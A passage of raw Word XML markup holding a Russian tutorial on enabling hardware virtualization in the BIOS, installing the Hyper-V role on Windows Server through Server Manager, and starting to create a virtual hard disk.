        <w:t>или</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AMD Virtualization</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (AMD-V) </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>процессоров</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> AMD.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На скриншотах ниже показано включение этих опций для стоечного сервера ProLiant DL585 G5 на базе AMD.</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9"/>
        <w:gridCol w:w="4925"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidTr="00DC7A61">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5068" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61">
            <w:pPr>
              <w:ind w:firstLine="567"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1792605" cy="1324610"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="143" name="Рисунок 25735" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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35" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image180.jpg"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId34" cstate="print">
                            <a:lum bright="30000"/>
                          </a:blip>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1792605" cy="1324610"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5069" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61">
            <w:pPr>
              <w:ind w:firstLine="567"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1749425" cy="1324610"/>
                  <wp:effectExtent l="19050" t="0" r="3175" b="0"/>
                  <wp:docPr id="142" name="Рисунок 25736" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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36" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image181.jpg"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId35" cstate="print">
                            <a:lum bright="30000"/>
                          </a:blip>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1749425" cy="1324610"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Теперь заходим в Windows Server с правами администратора и запускаем диспетчер сервера (</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пуск</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Администрирование</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диспетчер сервера</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). Раскрываем вкладку </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Роли</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и нажимаем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Добавить роли</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1615350" cy="1181657"/>
            <wp:effectExtent l="19050" t="0" r="3900" b="0"/>
            <wp:docPr id="141" name="Рисунок 25737" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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37" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image182.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36" cstate="print"/>
                    <a:srcRect r="5450"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1616340" cy="1182382"/>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Запустится </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мастер добавления ролей</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Жмем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> , затем выбираем в списке роль </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hyper-V</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и снова 2 нажимаем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1666320" cy="1224000"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="140" name="Рисунок 25738" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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38" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image183.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect r="2501"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1666229" cy="1223933"/>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Теперь необходимо выбрать один или несколько сетевых адаптеров из имеющихся физических сетевых карт для создания виртуальной сети. Отмечаем необходимые и жмем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1744950" cy="1287515"/>
            <wp:effectExtent l="19050" t="0" r="7650" b="0"/>
            <wp:docPr id="127" name="Рисунок 25739" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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39" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image184.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect r="2747"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1744615" cy="1287268"/>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В следующем окне жмем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установить</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> , дожидаемся конца установки и перезагружаем компьютер. После чего появится сообщение об успешной установке роли Hyper-V. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1810606" cy="1339200"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="126" name="Рисунок 25740" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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40" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image185.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect r="2505"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1810682" cy="1339256"/>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А в Диспетчере сервера раскрыв вкладку </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Роли</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> увидим, что там появилась роль </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hyper-V</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Раскрыв ее попадем на оснастку </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диспетчер Hyper-V</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (доступен также через </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пуск</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Администрирование</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диспетчер Hyper-V</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) где найдем наш сервер виртуализации (совпадает с именем физического компьютера). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1896150" cy="1312763"/>
            <wp:effectExtent l="19050" t="0" r="8850" b="0"/>
            <wp:docPr id="118" name="Рисунок 25741" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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41" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image186.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1896080" cy="1312715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создание виртуального жесткого диска</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Теперь создадим виртуальный жесткий диск. Сделать это можно и во время создания виртуальной машины, но я отдельно опишу эту процедуру. Итак, в Диспетчере Hyper-V кликаем правой кнопкой мыши по нашему серверу виртуализации, в контекстном меню выбираем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создать</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Жесткий диск…</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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1975350" cy="1369168"/>
            <wp:effectExtent l="19050" t="0" r="5850" b="0"/>
            <wp:docPr id="117" name="Рисунок 25924" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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24" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image187.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1975302" cy="1369135"/>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Запустится </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мастер создания виртуального жесткого диска</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> , жмем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
